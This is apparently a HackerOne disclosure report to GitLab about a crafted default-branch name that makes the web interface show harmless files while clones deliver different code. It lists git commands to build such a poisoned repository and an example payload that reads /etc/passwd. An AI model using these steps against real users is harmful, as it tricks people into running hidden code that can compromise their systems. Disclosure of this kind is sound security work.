The main branch of a repository with a specially designed name allows an attacker to create repositories with malicious code.
HackerOne report #1864278 by st4nly0n on 2023-02-06, assigned to GitLab Team:
Report | Attachments | How To Reproduce
Report
Description:
The main branch of a repository with a specially crafted name allows an attacker to create repositories with malicious code, victims who clone or download these repositories will execute arbitrary code on their systems.
When the main branch of a repository has the name <commit-hash>/<directory>, for example, 3038cd56e64b952a122215b4bef05814d7a25182/main, the Gitlab web interface will not display the files belonging to HEAD, the Gitlab web interface will display the contents of the files within the main directory that belong to commit 3038cd56e64b952a122215b4bef05814d7a25182.
In this state, the Gitlab web interface is not able to show the actual content of the files, the web interface will always show the content of the files in commit 3038cd56e64b952a122215b4bef0581414d7a25182, however, when downloading the repository from the web interface or when cloning via CLI, the victim gets the content of the files from HEAD.
Steps To Reproduce:
- The following steps must be performed as the attacker user
1. Create a public repository (Initialize README.md).
2. Unprotect the main branch.
3. Clone and enter the repository:
git clone <repo>
cd <repo>
4. Create a hello.sh file, with harmless code:
echo "echo 'hello world'" > hello.sh
5. Create a directory named main:
mkdir main
6. Copy the README.md and hello.sh files to the main directory:
cp README.md main/ && cp hello.sh main/
7. Delete git history:
git update-ref -d HEAD
8. Confirm changes and push to remote:
git add .
git commit -m 'Init'
git push origin HEAD -f
9. Create a shell variable with the date of the last commit:
GIT_COMMITTER_DATE=$(git show -s --format=%cd $(git rev-parse HEAD))
10. Create a branch with the following format <last-commit-hash>/<main>:
git checkout -b "$(git rev-parse HEAD)/main"
11. Push the branch to the remote:
git push origin HEAD -f
12. From the web interface, change the default branch to <last-commit-hash>/<main> created earlier.
13. Remove the main branch:
git push origin -d main
14. Remove the main directory from the <last-commit-hash>/<main> branch:
rm -rf main/
15. Change the content of hello.sh with the payload of your choice:
### EXAMPLE:
echo 'cat /etc/passwd' > hello.sh
16. Delete git history:
git update-ref -d HEAD
17. Confirm the changes with the modified date and push to remote:
git add .
git commit -m 'Init' --date "$GIT_COMMITTER_DATE"
git push origin HEAD -f As a result of this behavior, the proof-of-concept video shows how the victim views a repository through the Gitlab web interface, for the victim the hello.sh file does not represent a security risk; however, once it downloads or clones the repository and executes the hello.sh file, it executes an unexpected command.
Poc Video
poc.mp4
What is the current bug behavior?
The web interface does not guarantee file integrity when the main branch name has a specially crafted name. This allows an attacker to create repositories with poisoned content.
What is the expected correct behavior?
The files in the main branch of a repository that are displayed through the Gitlab web interface must be the same as the ones you get when downloading or cloning the repository.
Output of checks
This bug happens on GitLab.com
Impact
An attacker can get a victim to execute unexpected arbitrary commands on his system if the victim clones and executes files from a repository that initially do not pose a security risk.
For the proof of concept the victim has executed the calculator on his system, however, through what is described in this report, an attacker will want to take control of the victim's system or obtain confidential information, this attack manages to impact the availability, integrity and confidentiality of the affected user.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: